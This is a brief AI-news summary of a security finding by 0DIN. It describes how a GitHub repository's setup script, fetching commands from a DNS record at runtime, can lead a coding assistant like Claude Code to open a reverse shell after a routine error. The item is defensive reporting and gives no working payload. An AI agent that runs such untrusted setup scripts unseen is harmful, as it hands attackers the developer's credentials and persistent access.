Security researchers discovered a new attack vector where AI coding assistants like Claude Code can be tricked into running hidden malware from seemingly legitimate GitHub repositories. The attack exploits indirect prompt injection—malicious code is pulled from a DNS entry at runtime and executes automatically when the AI encounters a setup error, giving attackers reverse shell access to steal credentials and maintain persistence. The vulnerability underscores a significant risk for developers who use AI coding tools on untrusted third-party code.
Summaries like this, in your inbox every morning.
Sign up free →What happened
Security researchers at 0DIN found that attackers can compromise developers' machines through GitHub repositories using indirect prompt injection. A setup script in a repo pulls commands from a DNS entry at runtime and executes them invisibly—Claude Code hits a routine error, automatically runs the script, and opens a reverse shell giving attackers full control.
Why it matters
The malicious code never exists in the repository itself, making it invisible to scanners, code reviews, and the AI agent. Once an attacker gains access, they can steal API keys and login credentials and maintain persistent access. A single repo link shared in a job posting, tutorial, or Slack message is enough to compromise anyone who opens it with an AI coding tool.
What to watch
The researchers recommend that AI agents should display what is in a setup script before running it, and developers should treat setup instructions in third-party repos as untrusted code.
No comments yet. Be the first to share your thoughts!
Log in to join the discussion
Get curated AI news from 200+ sources delivered daily to your inbox. Free to use.
Get Started FreeFree · takes 30 seconds · unsubscribe anytime
1 minute a day. The AI essentials.
200+ sources · Email / LINE / Slack
